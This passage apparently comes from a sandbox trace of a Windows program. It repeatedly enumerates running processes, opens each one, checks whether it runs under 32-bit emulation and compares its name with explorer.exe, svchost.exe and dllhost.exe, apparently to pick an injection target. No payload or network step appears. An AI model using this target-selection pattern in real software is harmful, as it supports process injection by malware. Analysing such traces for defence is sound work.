lpString2="svchost.exe") returned 1 [0190.978] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0190.978] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0190.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0190.979] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.979] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.979] CloseHandle (hObject=0xec) returned 1 [0190.979] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0190.979] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0190.979] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0190.979] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0190.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0190.979] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.979] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.979] CloseHandle (hObject=0xec) returned 1 [0190.979] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0190.979] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0190.979] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0190.979] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0190.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0190.980] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.980] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.980] CloseHandle (hObject=0xec) returned 1 [0190.980] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0190.980] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0190.980] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0190.980] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0190.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0190.981] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.981] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.981] CloseHandle (hObject=0xec) returned 1 [0190.981] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0190.981] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0190.981] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0190.981] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0190.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0190.981] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.981] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.981] CloseHandle (hObject=0xec) returned 1 [0190.981] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0190.981] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0190.981] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0190.981] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0190.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0190.982] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.982] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.982] CloseHandle (hObject=0xec) returned 1 [0190.982] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0190.982] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0190.982] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0190.982] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0190.983] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0190.983] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0190.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0190.984] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0190.984] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0190.985] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0190.985] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0190.986] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.986] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.986] CloseHandle (hObject=0xec) returned 1 [0190.986] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0190.986] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.986] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.986] CloseHandle (hObject=0xec) returned 1 [0190.986] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0190.987] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0190.987] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.987] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.987] CloseHandle (hObject=0xec) returned 1 [0190.987] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0190.987] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0190.988] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.988] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.988] CloseHandle (hObject=0xec) returned 1 [0190.988] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.989] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0190.989] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.989] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.989] CloseHandle (hObject=0xec) returned 1 [0190.989] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0190.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0190.990] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.990] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0190.990] CloseHandle (hObject=0xec) returned 1 [0190.990] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0190.990] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0190.990] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0190.990] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0190.990] CloseHandle (hObject=0xe8) returned 1 [0190.991] Sleep (dwMilliseconds=0x3e8) [0192.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0192.220] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0192.221] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0192.221] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0192.222] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0192.222] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0192.223] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0192.223] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0192.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0192.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0192.225] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0192.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0192.225] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0192.226] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0192.227] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0192.227] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0192.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0192.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0192.229] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0192.229] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0192.230] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0192.230] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.230] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.230] CloseHandle (hObject=0xec) returned 1 [0192.230] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0192.231] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0192.231] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.231] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.231] CloseHandle (hObject=0xec) returned 1 [0192.231] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0192.232] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0192.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0192.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0192.233] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.233] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.233] CloseHandle (hObject=0xec) returned 1 [0192.233] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0192.233] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0192.233] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0192.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0192.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0192.234] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.234] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.234] CloseHandle (hObject=0xec) returned 1 [0192.234] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0192.234] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0192.234] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0192.234] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0192.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0192.235] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.235] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0192.235] CloseHandle (hObject=0xec) returned 1 [0192.235] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0192.235] lstrcmpiA (lpString1="receptor 